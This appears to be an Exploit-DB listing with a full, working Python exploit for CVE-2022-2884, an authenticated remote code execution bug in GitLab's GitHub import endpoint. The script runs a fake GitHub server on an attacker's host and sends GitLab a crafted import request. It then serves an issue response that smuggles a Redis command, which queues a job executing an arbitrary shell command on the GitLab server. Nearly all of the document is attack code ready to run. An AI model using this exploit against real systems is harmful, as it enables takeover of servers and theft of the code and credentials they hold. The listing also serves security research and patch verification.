GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

EDB-ID:

51181




Platform:

Ruby

Date:

2023-04-01


# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) 
# Date: 2022-12-25
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install/
# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1
# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution)
# CVE: CVE-2022-2884
# Category: WebApps
# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884
# Credits: yvvdwf (https://hackerone.com/reports/1672388)

# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.

# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 
# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution 
# via the Import from GitHub API endpoint.

# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/

# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses 
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.

import argparse
import logging
import validators
import random
import string
import requests
import time
import base64
import sys

from flask import Flask, current_app, request
from multiprocessing import Process

VERSION = "v1.0 (2022-12-25)"
DEFAULT_LOGGING_LEVEL = logging.INFO
app = Flask(__name__)

def parse_arguments():
    parser = argparse.ArgumentParser(
        description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}"
    )
    parser.add_argument("-u", "--url",
                        required=True,
                        help="URL of the victim GitLab")
    parser.add_argument("-pt", "--private-token",
                        required=True,
                        help="private token of GitLab")
    parser.add_argument("-tn", "--target-namespace",
                        required=False,
                        default="root",
                        help="target namespace of GitLab (default is 'root')")
    parser.add_argument("-a", "--address",
                        required=True,
                        help="IP address of the attacker machine")
    parser.add_argument("-p", "--port",
                        required=False,
                        type=int,
                        default=1337,
                        help="TCP port of the attacker machine (default is 1337)")
    parser.add_argument("-s", "--https",
                        action="store_true",
                        required=False,
                        default=False,
                        help="set if the attacker machine is exposed via HTTPS")
    parser.add_argument("-c", "--command",
                        required=True,
                        help="the command to execute")
    parser.add_argument("-d", "--delay",
                        type=float,
                        required=False,
                        help="seconds of delay to wait for the exploit to complete")
    parser.add_argument("-v", "--verbose",
                        action="store_true",
                        required=False,
                        default=False,
                        help="verbose mode")
    return parser.parse_args()

def validate_input(args):
    try:
        validators.url(args.url)
    except validators.ValidationFailure:
        raise ValueError("Invalid target URL!")
    
    if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"):
        raise ValueError("Invalid GitLab private token!")

    if len(args.target_namespace.strip()) < 1:
        raise ValueError("Invalid GitLab target namespace!")

    try:
        validators.ipv4(args.address)
    except validators.ValidationFailure:
        raise ValueError("Invalid attacker IP address!")
    
    if args.port < 1 or args.port > 65535:
        raise ValueError("Invalid attacker TCP port!")
    
    if len(args.command.strip()) < 1:
        raise ValueError("Invalid command!")
    
    if args.delay is not None and args.delay <= 0.0:
        raise ValueError("Invalid delay!")

def generate_random_string(length):
    letters = string.ascii_lowercase + string.ascii_uppercase + string.digits
    return ''.join(random.choice(letters) for i in range(length))

def generate_random_lowercase_string(length):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

def generate_random_number(length):
    letters = string.digits
    result = "0"
    while result.startswith("0"):
        result = ''.join(random.choice(letters) for i in range(length))
    return result

def base64encode(to_encode):
    return base64.b64encode(to_encode.encode("ascii")).decode("ascii")

def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id):
    logging.info("Sending request to target GitLab.")
    protocol = "http"
    if is_https:
        protocol += "s"
    headers = {
        "Content-Type": "application/json",
        "PRIVATE-TOKEN": private_token,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
    }
    fake_personal_access_token = "ghp_" + generate_random_string(36)
    new_name = generate_random_lowercase_string(8)
    logging.debug("Random generated parameters of the request:")
    logging.debug(f"              fake_repo_id = {fake_repo_id}")
    logging.debug(f"fake_personal_access_token = {fake_personal_access_token}")
    logging.debug(f"                  new_name = {new_name}")
    payload = {
        "personal_access_token": fake_personal_access_token,
        "repo_id": fake_repo_id,
        "target_namespace": target_namespace,
        "new_name": new_name,
        "github_hostname": f"{protocol}://{address}:{port}"
    }
    target_endpoint = f"{url}"
    if not target_endpoint.endswith("/"):
        target_endpoint = f"{target_endpoint}/"
    target_endpoint = f"{target_endpoint}api/v4/import/github"
    try:
        r = requests.post(target_endpoint, headers=headers, json=payload)
        logging.debug("Response:")
        logging.debug(f"status_code = {r.status_code}")
        logging.debug(f"       text = {r.text}")
        logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).")
        if r.status_code != 201:
            logging.fatal("Wrong response received from the target GitLab.")
            logging.debug(f"       text = {r.text}")
            raise Exception("Wrong response received from the target GitLab.")
    except:
        logging.fatal("Error in contacting the target GitLab.")
        raise Exception("Error in contacting the target GitLab.")

def is_server_alive(address, port, is_https):
    protocol = "http"
    if is_https:
        protocol += "s"
    try:
        r = requests.get(f"{protocol}://{address}:{port}/")
        if r.status_code == 200 and "The server is running." in r.text:
            return True
        else:
            return False
    except:
        return False

def start_fake_github_server(address, port, is_https, command, fake_repo_id):
    app.config["address"] = address
    app.config["port"] = port
    protocol = "http"
    if is_https:
        protocol += "s"
    app.config["attacker_server"] = f"{protocol}://{address}:{port}"
    app.config["command"] = command
    app.config["fake_user"] = generate_random_lowercase_string(8)
    app.config["fake_user_id"] = generate_random_number(8)
    app.config["fake_repo"] = generate_random_lowercase_string(8)
    app.config["fake_repo_id"] = fake_repo_id
    app.config["fake_issue_id"] = generate_random_number(9)
    app.run("0.0.0.0", port)

def encode_command(command):
    encoded_command = ""
    for c in command:
        encoded_command += ("<< " + str(ord(c)) + ".chr ")
    
    encoded_command += "<<"
    logging.debug(f"encoded_command = {encoded_command}")
    return encoded_command

def generate_rce_payload(command):
    logging.debug("Crafting RCE payload:")
    logging.debug(f"        command = {command}")
    encoded_command = encode_command(command) # Useful in order to prevent escaping hell...
    rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\""
    logging.debug(f"    rce_payload = {rce_payload}")
    return rce_payload

def generate_user_response(attacker_server, fake_user, fake_user_id):
    response = {
        "avatar_url": f"{attacker_server}/avatars/{fake_user_id}",
        "events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}",
        "followers_url": f"{attacker_server}/users/{fake_user}/followers",
        "following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}",
        "gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}",
        "gravatar_id": "",
        "html_url": f"{attacker_server}/{fake_user}",
        "id": int(fake_user_id),
        "login": f"{fake_user}",
        "node_id": base64encode(f"04:User{fake_user_id}"),
        "organizations_url": f"{attacker_server}/users/{fake_user}/orgs",
        "received_events_url": f"{attacker_server}/users/{fake_user}/received_events",
        "repos_url": f"{attacker_server}/users/{fake_user}/repos",
        "site_admin": False,
        "starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}",
        "subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions",
        "type": "User",
        "url": f"{attacker_server}/users/{fake_user}"
    }
    return response

def generate_user_full_response(attacker_server, fake_user, fake_user_id):
    partial = generate_user_response(attacker_server, fake_user, fake_user_id)
    others = {
        "bio": None,
        "blog": "",
        "company": None,
        "created_at": "2020-08-21T14:35:46Z",
        "email": None,
        "followers": 2,
        "following": 0,
        "hireable": None,
        "location": None,
        "name": None,
        "public_gists": 0,
        "public_repos": 0,
        "twitter_username": None,
        "updated_at": "2022-08-08T12:11:40Z",
    }
    response = {**partial, **others}
    return response

def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id):
    response = {
        "allow_auto_merge": False,
        "allow_forking": True,
        "allow_merge_commit": True,
        "allow_rebase_merge": True,
        "allow_squash_merge": True,
        "allow_update_branch": False,
        "archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}",
        "archived": False,
        "assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}",
        "blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}",
        "branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}",
        "clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git",
        "collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}",
        "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}",
        "commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}",
        "compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}",
        "contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}",
        "contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors",
        "created_at": "2021-04-09T13:55:55Z",
        "default_branch": "main",
        "delete_branch_on_merge": False,
        "deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments",
        "description": None,
        "disabled": False,
        "downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads",
        "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events",
        "fork": False,
        "forks": 1,
        "forks_count": 1,
        "forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks",
        "full_name": f"{fake_user}/{fake_repo}",
        "git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}",
        "git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}",
        "git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}",
        "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git",
        "has_downloads": True,
        "has_issues": True,
        "has_pages": False,
        "has_projects": True,
        "has_wiki": True,
        "homepage": None,
        "hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks",
        "html_url": f"{attacker_server}/{fake_user}/{fake_repo}",
        "id": int(repo_id),
        "is_template": False,
        "issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}",
        "issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}",
        "issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}",
        "keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}",
        "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}",
        "language": "Python",
        "languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages",
        "license": None,
        "merge_commit_message": "Message",
        "merge_commit_title": "Title",
        "merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges",
        "milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}",
        "mirror_url": None,
        "name": f"{fake_repo}",
        "network_count": 1,
        "node_id": base64encode(f"010:Repository{repo_id}"),
        "notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}",
        "open_issues": 4,
        "open_issues_count": 4,
        "owner": generate_user_response(attacker_server, fake_user, fake_user_id),
        "permissions": {
            "admin": True,
            "maintain": True,
            "pull": True,
            "push": True,
            "triage": True
        },
        "private": True,
        "pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}",
        "pushed_at": "2022-08-14T15:36:21Z",
        "releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}",
        "size": 3802,
        "squash_merge_commit_message": "Message",
        "squash_merge_commit_title": "Title",
        "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git",
        "stargazers_count": 0,
        "stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers",
        "statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}",
        "subscribers_count": 1,
        "subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers",
        "subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription",
        "svn_url": f"{attacker_server}/{fake_user}/{fake_repo}",
        "tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags",
        "teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams",
        "temp_clone_token": generate_random_string(32),
        "topics": [],
        "trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}",
        "updated_at": "2022-06-10T15:12:53Z",
        "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}",
        "use_squash_pr_title_as_default": False,
        "visibility": "private",
        "watchers": 0,
        "watchers_count": 0,
        "web_commit_signoff_required": False
    }
    return response

def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command):
    rce_payload = generate_rce_payload(command)
    response = [
        {
            "active_lock_reason": None,
            "assignee": None,
            "assignees": [],
            "author_association": "OWNER",
            "body": "hn-issue description",
            "closed_at": None,
            "comments": 1,
            "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments",
            "created_at": "2021-07-23T13:16:55Z",
            "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events",
            "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3",
            "id": int(fake_issue_id),
            "labels": [],
            "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}",
            "locked": False,
            "milestone": None,
            "node_id": base64encode(f"05:Issue{fake_issue_id}"),
            "_number": 1,
            "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }},
            "performed_via_github_app": None,
            "reactions": {
                "+1": 0,
                "-1": 0,
                "confused": 0,
                "eyes": 0,
                "heart": 0,
                "hooray": 0,
                "laugh": 0,
                "rocket": 0,
                "total_count": 0,
                "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions"
            },
            "repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test",
            "state": "open",
            "state_reason": None,
            "timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline",
            "title": f"{fake_repo}",
            "updated_at": "2022-08-14T15:37:08Z",
            "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3",
            "user": generate_user_response(attacker_server, fake_user, fake_user_id)
        }
    ]
    return response

@app.before_request
def received_request():
    logging.debug(f"Received request:")
    logging.debug(f"    url = {request.url}")
    logging.debug(f"headers = {request.headers}")

@app.after_request
def add_headers(response):
    response.headers["content-type"] = "application/json; charset=utf-8"
    response.headers["x-ratelimit-limit"] = "5000"
    response.headers["x-ratelimit-remaining"] = "4991"
    response.headers["x-ratelimit-reset"] = "1660136749"
    response.headers["x-ratelimit-used"] = "9"
    response.headers["x-ratelimit-resource"] = "core"
    return response

@app.route("/")
def index():
    return "The server is running."

@app.route("/api/v3/rate_limit")
def api_rate_limit():
    response = {
        "resources": {
            "core": {
                "limit": 5000,
                "used": 9,
                "remaining": 4991,
                "reset": 1660136749
            },
            "search": {
                "limit": 30,
                "used": 0,
                "remaining": 30,
                "reset": 1660133589
            },
            "graphql": {
                "limit": 5000,
                "used": 0,
                "remaining": 5000,
                "reset": 1660137129
            },
            "integration_manifest": {
                "limit": 5000,
                "used": 0,
                "remaining": 5000,
                "reset": 1660137129
            },
            "source_import": {
                "limit": 100,
                "used": 0,
                "remaining": 100,
                "reset": 1660133589
            },
            "code_scanning_upload": {
                "limit": 1000,
                "used": 0,
                "remaining": 1000,
                "reset": 1660137129
            },
            "actions_runner_registration": {
                "limit": 10000,
                "used": 0,
                "remaining": 10000,
                "reset": 1660137129
            },
            "scim": {
                "limit": 15000,
                "used": 0,
                "remaining": 15000,
                "reset": 1660137129
            },
            "dependency_snapshots": {
                "limit": 100,
                "used": 0,
                "remaining": 100,
                "reset": 1660133589
            }
        },
        "rate": {
            "limit": 5000,
            "used": 9,
            "remaining": 4991,
            "reset": 1660136749
        }
    }
    return response

@app.route("/api/v3/repositories/<repo_id>")
@app.route("/repositories/<repo_id>")
def api_repositories_repo_id(repo_id: int):
    address = current_app.config["address"]
    port = current_app.config["port"]
    attacker_server = current_app.config["attacker_server"]
    fake_user = current_app.config["fake_user"]
    fake_user_id = current_app.config["fake_user_id"]
    fake_repo = current_app.config["fake_repo"]
    response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id)
    return response

@app.route("/api/v3/repos/<user>/<repo>")
def api_repositories_repo_user_repo(user: string, repo: string):
    address = current_app.config["address"]
    port = current_app.config["port"]
    attacker_server = current_app.config["attacker_server"]
    fake_user_id = current_app.config["fake_user_id"]
    fake_repo_id = current_app.config["fake_repo_id"]
    response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id)
    return response

@app.route("/api/v3/repos/<user>/<repo>/issues")
def api_repositories_repo_user_repo_issues(user: string, repo: string):
    attacker_server = current_app.config["attacker_server"]
    fake_user_id = current_app.config["fake_user_id"]
    fake_issue_id = current_app.config["fake_issue_id"]
    command = current_app.config["command"]
    response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command)
    return response

@app.route("/api/v3/users/<user>")
def api_users_user(user: string):
    attacker_server = current_app.config["attacker_server"]
    fake_user_id = current_app.config["fake_user_id"]
    response = generate_user_full_response(attacker_server, user, fake_user_id)
    return response

@app.route("/<user>/<repo>.git/HEAD")
@app.route("/<user>/<repo>.git/info/refs")
@app.route("/<user>/<repo>.wiki.git/HEAD")
@app.route("/<user>/<repo>.wiki.git/info/refs")
def empty_response(user: string, repo: string):
    logging.debug("Empty string response.")
    return ""

# All the others/non-existing routes.
@app.route('/<path:path>')
def catch_all(path):
    logging.debug("Empty JSON array response.")
    return []

def main():
    args = parse_arguments()
    logging_level = DEFAULT_LOGGING_LEVEL
    if args.verbose:
        logging_level = logging.DEBUG
    logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")

    validate_input(args)
    url = args.url.strip()
    private_token = args.private_token.strip()
    target_namespace = args.target_namespace.strip()
    address = args.address.strip()
    port = args.port
    is_https = args.https
    command = args.command.strip()
    delay = args.delay
    logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}")
    logging.debug("Parameters:")
    logging.debug(f"             url = {url}")
    logging.debug(f"   private_token = {private_token}")
    logging.debug(f"target_namespace = {target_namespace}")
    logging.debug(f"         address = {address}")
    logging.debug(f"            port = {port}")
    logging.debug(f"        is_https = {is_https}")
    logging.debug(f"         command = {command}")
    logging.debug(f"           delay = {delay}")

    fake_repo_id = generate_random_number(9)

    fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id))
    fake_github_server.start()

    logging.info("Waiting for the fake GitHub server to start.")
    while not is_server_alive(address, port, is_https):
        time.sleep(1)
        logging.debug("Waiting for the fake GitHub server to start.")
    logging.info("Fake GitHub server is running.")

    try:
        send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id)
    except:
        logging.critical("Aborting the script.")
        fake_github_server.kill()
        sys.exit(1)

    if delay is not None:
        logging.info(f"Waiting for {delay} seconds to let attack finish.")
        time.sleep(delay)
    else:
        logging.info("Press Enter when the attack is finished.")
        input()

    logging.debug("Stopping the fake GitHub server.")
    fake_github_server.kill()

    logging.info("Closing the script.")

if __name__ == "__main__":
    main()